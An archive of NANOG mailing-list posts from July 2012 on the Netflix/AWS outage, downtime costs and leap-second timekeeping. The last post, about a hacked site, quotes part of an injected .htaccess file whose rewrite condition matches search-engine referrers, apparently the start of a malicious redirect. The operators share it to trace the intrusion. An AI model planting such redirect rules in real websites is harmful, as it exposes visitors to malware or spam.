From dgolding at ragingwire.com Tue Jul 3 08:11:11 2012 From: dgolding at ragingwire.com (Dan Golding) Date: Tue, 3 Jul 2012 06:11:11 -0700 Subject: FYI Netflix is down In-Reply-To: <7CEE65E1-A4D6-44B3-8686-4222F436D9A6@egon.cc> References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> <7CEE65E1-A4D6-44B3-8686-4222F436D9A6@egon.cc> Message-ID: <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> > -----Original Message----- > From: James Downs [mailto:egon at egon.cc] > > > On Jul 2, 2012, at 7:19 PM, Rodrick Brown wrote: > > > People are acting as if Netflix is part of some critical service they > stream movies for Christ sake. Some acceptable level of loss is fine > for 99.99% of Netflix's user base just like cable, electricity and > running water I suffer a few hours of losses each year from those > services it sucks, yes, is it the end of the world no.. > > You missed the point. And very publicly missed the point, too. The Netflix issues led to a large discussion of downtime, testing, and fault tolerance that has been very useful for the community and could lead to some good content for NANOG conferences (/pokes PC). For Netflix (and all other similar services) downtime is money and money is downtime. There is a quantifiable cost for customer acquisition and a quantifiable churn during each minute of downtime. Mature organizations actually calculate and track this. The trick is to ensure that you have balanced the cost of greater redundancy vs the cost of churn/customer acquisition. If you are spending too much on redundancy, it's as big a mistake as spending too little. Also, I don't think there is an acceptable level of downtime for water. 
Neither do water utilities. - Dan From joelja at bogus.com Tue Jul 3 09:02:33 2012 From: joelja at bogus.com (Joel jaeggli) Date: Tue, 03 Jul 2012 07:02:33 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <878vf1i5sb.fsf@arbol.wsrcc.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> Message-ID: <4FF2FB79.9000306@bogus.com> On 7/3/12 01:54 , Wolfgang S. Rupprecht wrote: > > Steven Bellovin writes: >> See >> http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html > > Maybe we should stop wrenching the poor system time back and forth. We > no longer add or subtract daylight savings time (or timezones) to the > kernel time, why do we do it with leapseconds? We should really move > the leapseconds correction into the display routines like DST and > timezones already are. I believe the Olson time code already has ifdefs > for doing this. I wonder why the system's internal time isn't run that > way. Neither timezones nor DST impact the length of the mean solar day. TAI is some 35 seconds ahead of UTC at this point, and will continue to diverge in a fashion which is not sufficiently predictable that you can know it over the long term. Not using UTC as the timebase is certainly possible; GPS does that, for example. "Apps are buggy" sounds like a really poor excuse for doing so. > -wolfgang > From valdis.kletnieks at vt.edu Tue Jul 3 09:33:21 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 03 Jul 2012 10:33:21 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Your message of "Tue, 03 Jul 2012 12:31:03 +0300." 
<20120703093103.GA9947@pob.ytti.fi> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> Message-ID: <214705.1341326001@turing-police.cc.vt.edu> On Tue, 03 Jul 2012 12:31:03 +0300, Saku Ytti said: > Yes. TAI time natively and presentation uses leap lookup tables to convert > to UTC. On the other hand, how many subtle bugs will we introduce when we break code that currently assumes the system clock is UTC, not TAI? From saku at ytti.fi Tue Jul 3 09:39:55 2012 From: saku at ytti.fi (Saku Ytti) Date: Tue, 3 Jul 2012 17:39:55 +0300 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <214705.1341326001@turing-police.cc.vt.edu> References: <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> Message-ID: <20120703143955.GA15933@pob.ytti.fi> On (2012-07-03 10:33 -0400), valdis.kletnieks at vt.edu wrote: > On the other hand, how many subtle bugs will we introduce when we break > code that currently assumes the system clock is UTC, not TAI? 
Progress has non-zero cost :) -- ++ytti From valdis.kletnieks at vt.edu Tue Jul 3 09:51:29 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 03 Jul 2012 10:51:29 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Your message of "Tue, 03 Jul 2012 07:02:33 -0700." <4FF2FB79.9000306@bogus.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <4FF2FB79.9000306@bogus.com> Message-ID: <217021.1341327089@turing-police.cc.vt.edu> On Tue, 03 Jul 2012 07:02:33 -0700, Joel jaeggli said: > Apps are buggy sounds like a really poor excuse for doing so. When the published API has been "the system clock is in UTC" for some 3 decades, I hardly think it's acceptable to call apps "buggy" for assuming that the system clock is in fact using UTC and breaking if you switch it to something that's not UTC. And the new time *has* to have different semantics than UTC, because if it doesn't then what's the point of changing it? From malayter at gmail.com Tue Jul 3 09:58:22 2012 From: malayter at gmail.com (Ryan Malayter) Date: Tue, 3 Jul 2012 09:58:22 -0500 Subject: FYI Netflix is down Message-ID: James Downs wrote: > For Netflix (and all other similar > services) downtime is money and money is downtime. There is a > quantifiable cost for customer acquisition and a quantifiable churn > during each minute of downtime. Mature organizations actually calculate > and track this. 
The trick is to ensure that you have balanced the cost > of greater redundancy vs the cost of churn/customer acquisition. If you > are spending too much on redundancy, it's as big a mistake as spending > too little. Actually, for Netflix, so long as downtime is infrequent or short enough that users don't cancel, it actually saves them money. They're not paying royalties for movies being streamed during downtime, but they're still collecting their $8/month. There is no meaningful SLA for the end user to my knowledge. I imagine the threshold for *any* user churn based on downtime is very high for Netflix. So long as they are "about as good as cable/satellite TV" in terms of uptime Netflix will do fine. You would have to get into 98% uptime or lower before people would really start getting irritated enough to cancel. Of course multiple short outages would be more painful than a few longer ones from a customer's perspective. I imagine Netflix is mature enough to track this data as you suggest, and that's why they use AWS - downtime isn't a big deal for their business unless it gets really, really bad. From egon at egon.cc Tue Jul 3 10:15:18 2012 From: egon at egon.cc (James Downs) Date: Tue, 3 Jul 2012 08:15:18 -0700 Subject: FYI Netflix is down In-Reply-To: <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> <7CEE65E1-A4D6-44B3-8686-4222F436D9A6@egon.cc> <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: <5DFD0BE3-23CF-43AF-8918-54BD37D5ED63@egon.cc> On Jul 3, 2012, at 6:11 AM, Dan Golding wrote: > Also, I don't think there is an acceptable level of downtime for water. 
> Neither do water utilities. I remember a certain conversation I had with a web-developer. We were talking about "zero downtime releases". He thought it was acceptable if the website went down for 15 minutes, "because people will just come back". Naturally, he was not as forgiving about the idea that his bank might think the same way, or that I might provide DB or server uptimes with that kind of reliability. Downtime will kill some companies, and not others. Twitter certainly survived their fail-whale period. But then, no one pays for Twitter. -j From joelja at bogus.com Tue Jul 3 10:18:47 2012 From: joelja at bogus.com (Joel jaeggli) Date: Tue, 03 Jul 2012 08:18:47 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <217021.1341327089@turing-police.cc.vt.edu> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <4FF2FB79.9000306@bogus.com> <217021.1341327089@turing-police.cc.vt.edu> Message-ID: <4FF30D57.9010605@bogus.com> On 7/3/12 07:51 , valdis.kletnieks at vt.edu wrote: > On Tue, 03 Jul 2012 07:02:33 -0700, Joel jaeggli said: > >> Apps are buggy sounds like a really poor excuse for doing so. > > When the published API has been "the system clock is in UTC" for some 3 > decades, I hardly think it's acceptable to call apps "buggy" for assuming that > the system clock is in fact using UTC and breaking if you switch it to > something that's not UTC. And the new time *has* to have different semantics > than UTC, because if it doesn't then what's the point of changing it? Right, you and I agree: proposing to switch off UTC because of buggy applications is a rather bad premise. 
Software runs into trouble with the handling of leap years, yet few people (apart from perhaps the Orthodox Church) are proposing to throw off the Julian and Gregorian calendar reforms. From ag4ve.us at gmail.com Tue Jul 3 10:35:00 2012 From: ag4ve.us at gmail.com (shawn wilson) Date: Tue, 3 Jul 2012 11:35:00 -0400 Subject: Fwd: Re: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <4FF2FB79.9000306@bogus.com> Message-ID: ---------- Forwarded message ---------- From: "shawn wilson" Date: Jul 3, 2012 11:33 AM Subject: Re: F-ckin Leap Seconds, how do they work? To: "Joel jaeggli" I agree with TAI. Epoch is supposed to be an unsigned long int starting ~1970 (there are 4 epochs iirc, but never mind that). I don't recall the rfc, but I don't recall this spec mentioning leap seconds (and it shouldn't). Frankly our time system is buggy as hell (no year 0, base 60 seconds and minutes, base 24 hours, no standard month base, e/m isn't a part of the system, etc). I find my last issue the most disconcerting with our system and makes it really unreliable - GPS time is *not* earth time and we rely on that skew for everything. To that point, I hate to think how many missile tests it took them to figure that one out :) However there is no reason to add more crap to an already messed up system. On Jul 3, 2012 10:03 AM, "Joel jaeggli" wrote: > On 7/3/12 01:54 , Wolfgang S. Rupprecht wrote: > > > > Steven Bellovin writes: > >> See > >> > http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html > > > > Maybe we should stop wrenching the poor system time back and forth. 
We > > no longer add or subtract daylight savings time (or timezones) to the > > kernel time, why do we do it with leapseconds? We should really move > > the leapseconds correction into the display routines like DST and > > timezones already are. I believe the Olson time code already has ifdefs > > for doing this. I wonder why the system's internal time isn't run that > > way. > > Neither timezones nor DST impact the length of the mean solar day. > > TAI is some 35 seconds ahead of UTC at this point, and will continue to > diverge in a fashion which is not sufficiently predictable that you can > know it over the long term. > > Not using UTC as the timebase is certainly possible; GPS does that, for > example. > > "Apps are buggy" sounds like a really poor excuse for doing so. > > > > -wolfgang > > > > > > From rodrick.brown at gmail.com Tue Jul 3 10:35:06 2012 From: rodrick.brown at gmail.com (Rodrick Brown) Date: Tue, 3 Jul 2012 11:35:06 -0400 Subject: FYI Netflix is down In-Reply-To: <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> <7CEE65E1-A4D6-44B3-8686-4222F436D9A6@egon.cc> <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: On Jul 3, 2012, at 9:11 AM, "Dan Golding" wrote: >> -----Original Message----- >> From: James Downs [mailto:egon at egon.cc] >> >> >> On Jul 2, 2012, at 7:19 PM, Rodrick Brown wrote: >> >>> People are acting as if Netflix is part of some critical service > they >> stream movies for Christ sake. 
Some acceptable level of loss is fine >> for 99.99% of Netflix's user base just like cable, electricity and >> running water I suffer a few hours of losses each year from those >> services it sucks, yes, is it the end of the world no.. >> >> You missed the point. > > And very publicly missed the point, too. The Netflix issues led to a > large discussion of downtime, testing, and fault tolerance that has been > very useful for the community and could lead to some good content for > NANOG conferences (/pokes PC). For Netflix (and all other similar > services) downtime is money and money is downtime. There is a > quantifiable cost for customer acquisition and a quantifiable churn > during each minute of downtime. Mature organizations actually calculate > and track this. The trick is to ensure that you have balanced the cost > of greater redundancy vs the cost of churn/customer acquisition. If you > are spending too much on redundancy, it's as big a mistake as spending > too little. I totally got the point and the last bit of my post was just tongue in cheek. As I stated in my original response it's very unrealistic to plan for every possible failure scenario given the constraints most businesses face when implementing BCP today. I doubt Amazon gave much thought to multiple site outages and clients not being able to dynamically redeploy their engines because of inaccessibility from ELB. > > Also, I don't think there is an acceptable level of downtime for water. > Neither do water utilities. > > - Dan > From rodrick.brown at gmail.com Tue Jul 3 10:36:44 2012 From: rodrick.brown at gmail.com (Rodrick Brown) Date: Tue, 3 Jul 2012 11:36:44 -0400 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: <985726B7-D435-4C22-9D48-1108EDCA6232@gmail.com> On Jul 3, 2012, at 10:58 AM, Ryan Malayter wrote: > James Downs wrote: >> For Netflix (and all other similar >> services) downtime is money and money is downtime. 
There is a >> quantifiable cost for customer acquisition and a quantifiable churn >> during each minute of downtime. Mature organizations actually calculate >> and track this. The trick is to ensure that you have balanced the cost >> of greater redundancy vs the cost of churn/customer acquisition. If you >> are spending too much on redundancy, it's as big a mistake as spending >> too little. > > Actually, for Netflix, so long as downtime is infrequent or short > enough that users don't cancel, it actually saves them money. They're > not paying royalties for movies being streamed during downtime, but > they're still collecting their $8/month. There is no meaningful SLA > for the end user to my knowledge. > > I imagine the threshold for *any* user churn based on downtime is very > high for Netflix. So long as they are "about as good as > cable/satellite TV" in terms of uptime Netflix will do fine. You would > have to get into 98% uptime or lower before people would really start > getting irritated enough to cancel. Of course multiple short outages > would be more painful than a few longer ones from a customer's > perspective. > > I imagine Netflix is mature enough to track this data as you suggest, > and that's why they use AWS - downtime isn't a big deal for their > business unless it gets really, really bad. > My thoughts exactly! 
From drais at icantclick.org Tue Jul 3 11:06:31 2012 From: drais at icantclick.org (david raistrick) Date: Tue, 3 Jul 2012 12:06:31 -0400 (EDT) Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> <7CEE65E1-A4D6-44B3-8686-4222F436D9A6@egon.cc> <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: On Tue, 3 Jul 2012, Rodrick Brown wrote: > face when implementing BCP today. I doubt Amazon gave much thought to > multiple site outages and clients not being able to dynamically redeploy > their engines because of inaccessibility from ELB. Considering there's a grand total of -one- tool in the entire AWS toolkit that supports working across multiple regions at all sanely (that would be ec2-migrate-bundle, btw), I'd agree. Amazon has put nearly zero thought into multiple site outages or how their customer base could leverage the multiple sites (regions) operated by AWS. -- david raistrick http://www.netmeister.org/news/learn2quote.html drais at icantclick.org From valdis.kletnieks at vt.edu Tue Jul 3 11:53:02 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 03 Jul 2012 12:53:02 -0400 Subject: Fwd: Re: F-ckin Leap Seconds, how do they work? In-Reply-To: Your message of "Tue, 03 Jul 2012 11:35:00 -0400." 
References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <4FF2FB79.9000306@bogus.com> Message-ID: <8251.1341334382@turing-police.cc.vt.edu> On Tue, 03 Jul 2012 11:35:00 -0400, shawn wilson said: > and makes it really unreliable - GPS time is *not* earth time and we rely > on that skew for everything. To that point, I hate to think how many > missile tests it took them to figure that one out :) Actually, GPS time is pretty ugly mathematically, as it has to make relativistic corrections for time dilation due to speed of the satellites and for gravity-well dilation (which are in opposite directions). You don't want to go there in a world where programmers still get the 400 rule for leap years wrong. ;) From cmadams at hiwaay.net Tue Jul 3 11:58:00 2012 From: cmadams at hiwaay.net (Chris Adams) Date: Tue, 3 Jul 2012 11:58:00 -0500 Subject: Fwd: Re: F-ckin Leap Seconds, how do they work? 
In-Reply-To: <8251.1341334382@turing-police.cc.vt.edu> References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <4FF2FB79.9000306@bogus.com> <8251.1341334382@turing-police.cc.vt.edu> Message-ID: <20120703165800.GA3723@hiwaay.net> Once upon a time, valdis.kletnieks at vt.edu said: > Actually, GPS time is pretty ugly mathematically, as it has to make > relativistic corrections for time dilation due to speed of the satellites > and for gravity-well dilation (which are in opposite directions). That's how GPS _calculates_ the time, but "GPS time" (i.e. time as reported by GPS) is a constant offset from TAI (TAI - UTC as of 1980). -- Chris Adams Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble. From jlewis at lewis.org Tue Jul 3 12:06:53 2012 From: jlewis at lewis.org (Jon Lewis) Date: Tue, 3 Jul 2012 13:06:53 -0400 (EDT) Subject: FYI Netflix is down In-Reply-To: References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org> Message-ID: On Mon, 2 Jul 2012, Greg D. Moore wrote: > As for pulling the plug to test stuff. I recall a demo at Netapps in the > early 00's. They were talking about their fault tolerance and how great it > was. So I walked up to their demo array and said, "So, it shouldn't be a > problem if I pulled this drive right here?" Before I could, the salesperson > or tech guy, can't remember which, told me to stop. He didn't want to risk it. Lightweight. Your story reminded me of this Sun ZFS demo. 
http://www.youtube.com/watch?v=QGIwg6ye1gE ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From jlewis at lewis.org Tue Jul 3 12:13:39 2012 From: jlewis at lewis.org (Jon Lewis) Date: Tue, 3 Jul 2012 13:13:39 -0400 (EDT) Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> Message-ID: On Mon, 2 Jul 2012, david raistrick wrote: > On Mon, 2 Jul 2012, James Downs wrote: > >>> back-plane / control-plane was unable to cope with the requests. Netflix >>> uses Amazon's ELB to balance the traffic and no back-plane meant they were >>> unable to reconfigure it to route around the problem. >> >> Someone needs to define back-plane/control-plane in this case. (and what >> wasn't working) > > Amazon resources are controlled (from a consumer viewpoint) by API - that API > is also used by amazon's internal toolkits that support ELB (and RDS..). > Those (http accessed) API interfaces were unavailable for a good portion of > the outages. It seems like if you're going to outsource your mission critical infrastructure to "cloud" you should probably pick at least 2 unrelated cloud providers and if at all possible, not outsource the systems that balance/direct traffic...and if you're really serious about it, have at least two of these set up at different facilities such that if the primary goes offline, the secondary takes over. If a cloud provider fails, you redirect to another. 
---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From owen at delong.com Tue Jul 3 12:11:23 2012 From: owen at delong.com (Owen DeLong) Date: Tue, 3 Jul 2012 10:11:23 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120703143955.GA15933@pob.ytti.fi> References: <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> Message-ID: <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> On Jul 3, 2012, at 7:39 AM, Saku Ytti wrote: > On (2012-07-03 10:33 -0400), valdis.kletnieks at vt.edu wrote: > >> On the other hand, how many subtle bugs will we introduce when we break >> code that currently assumes the system clock is UTC, not TAI? > > Progress has non-zero cost :) > > -- > ++ytti Trading one known set of bugs for a (probably) larger set of unknown bugs is not my definition of progress. Cost without progress is harmful and should be avoided. Owen From sethm at rollernet.us Tue Jul 3 12:38:03 2012 From: sethm at rollernet.us (Seth Mattinen) Date: Tue, 03 Jul 2012 10:38:03 -0700 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: <4FF32DFB.8080703@rollernet.us> On 6/29/12 8:22 PM, Joe Blanchard wrote: > Seems that they are unreachable at the moment. Called and there's a recorded > message stating they are aware of an issue, no details. 
> I didn't see anyone post this yet, so here's Amazon's summary of events: http://aws.amazon.com/message/67457/ From jra at baylink.com Tue Jul 3 12:38:15 2012 From: jra at baylink.com (Jay Ashworth) Date: Tue, 3 Jul 2012 13:38:15 -0400 (EDT) Subject: FYI Netflix is down In-Reply-To: Message-ID: <24628127.12292.1341337095357.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Steven Bellovin" > Subject: Re: FYI Netflix is down > On Jul 2, 2012, at 3:43 PM, Greg D. Moore wrote: > > > At 03:08 PM 7/2/2012, George Herbert wrote: > > > > If folks have not read it, I would suggest reading Normal Accidents > > by Charles Perrow. > > Strong second to that suggestion. Quite unfortunately, that book appears not to be in Safari's library. Does anyone here know anyone at Safari? Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From saku at ytti.fi Tue Jul 3 12:59:05 2012 From: saku at ytti.fi (Saku Ytti) Date: Tue, 3 Jul 2012 20:59:05 +0300 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> Message-ID: <20120703175905.GA15977@pob.ytti.fi> On (2012-07-03 10:11 -0700), Owen DeLong wrote: > Trading one known set of bugs for a (probably) larger set of unknown bugs is not my definition of progress. Cost without progress is harmful and should be avoided. Leap bugs are NOT known. Most people have no idea unixtime is not monotonically increasing. 
I had no idea myself until Sunday, I had assumed we really go 59 -> 60 -> 00, but we go 59 -> 59 -> 00. So 59.1 can happen before or after 59.2. To me this is fundamentally and inherently broken. It's quite hard to find code which stores a timestamp and then compares it in future to a timestamp which assumes time can travel backwards. Most bugs are just things that should last 5s last 6s or 4s, but certainly the bugs exist and developers were not aware that they exist. -- ++ytti From kyle.creyts at gmail.com Tue Jul 3 13:27:41 2012 From: kyle.creyts at gmail.com (Kyle Creyts) Date: Tue, 3 Jul 2012 14:27:41 -0400 Subject: No DNS poisoning at Google (in case of trouble, blame the DNS) In-Reply-To: References: <20120627075051.GA11061@nic.fr> <20120627132604.GA74019@DataIX.net> Message-ID: it actually appears that skywire has a suballocation for that block, http://www.robtex.com/ip/208.88.11.111.html#whois # # The following results may also be obtained via: # http://whois.arin.net/rest/nets;q=208.88.11.111?showDetails=true&showARIN=false&ext=netref2 # American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0 - 208.88.11.255 Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255 # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/whois_tou.html # On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black wrote: > By the way, FTP access originated from: 208.88.11.111 > > Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - > 208.88.11.255 > > NetRange: 208.88.8.0 - 208.88.11.255 > CIDR: 208.88.8.0/22 > OriginAS: AS40603 > NetName: SKYWIRE-SG > NetHandle: NET-208-88-8-0-1 > Parent: NET-208-0-0-0-0 > NetType: Direct Allocation > Comment: http://www.skywireusa.com > RegDate: 2008-03-04 > Updated: 2012-03-02 > Ref: http://whois.arin.net/rest/net/NET-208-88-8-0-1 > > OrgName: Sky Wire Communications > OrgId: DGSU > Address: 946 W Sunset Blvd Ste L > City: St George > StateProv: UT > 
PostalCode: 84770 > Country: US > RegDate: 2007-12-04 > Updated: 2009-11-04 > Ref: http://whois.arin.net/rest/org/DGSU > > > Who We Are > Skywire Communications is the Leading High Speed Internet Provider in > Southern Utah. Offering Service in St George, Washington, Santa Clara, > Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to > provide high speed internet access to 100 Percent of Southern Utah. We are > located in St George, Utah. > > > > > matthew black > information technology services > california state university, long beach > > > > -----Original Message----- > From: Matthew Black [mailto:Matthew.Black at csulb.edu] > Sent: Wednesday, June 27, 2012 9:52 AM > To: 'Jason Hellenthal'; Arturo Servin > Cc: nanog at nanog.org > Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS) > > Ask and ye shall receive: > > # more .htaccess (backup copy) > > #c3284d# > > RewriteEngine On > RewriteCond %{HTTP_REFERER} > ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt > > avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea > > rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d > > ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel > > and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea > > 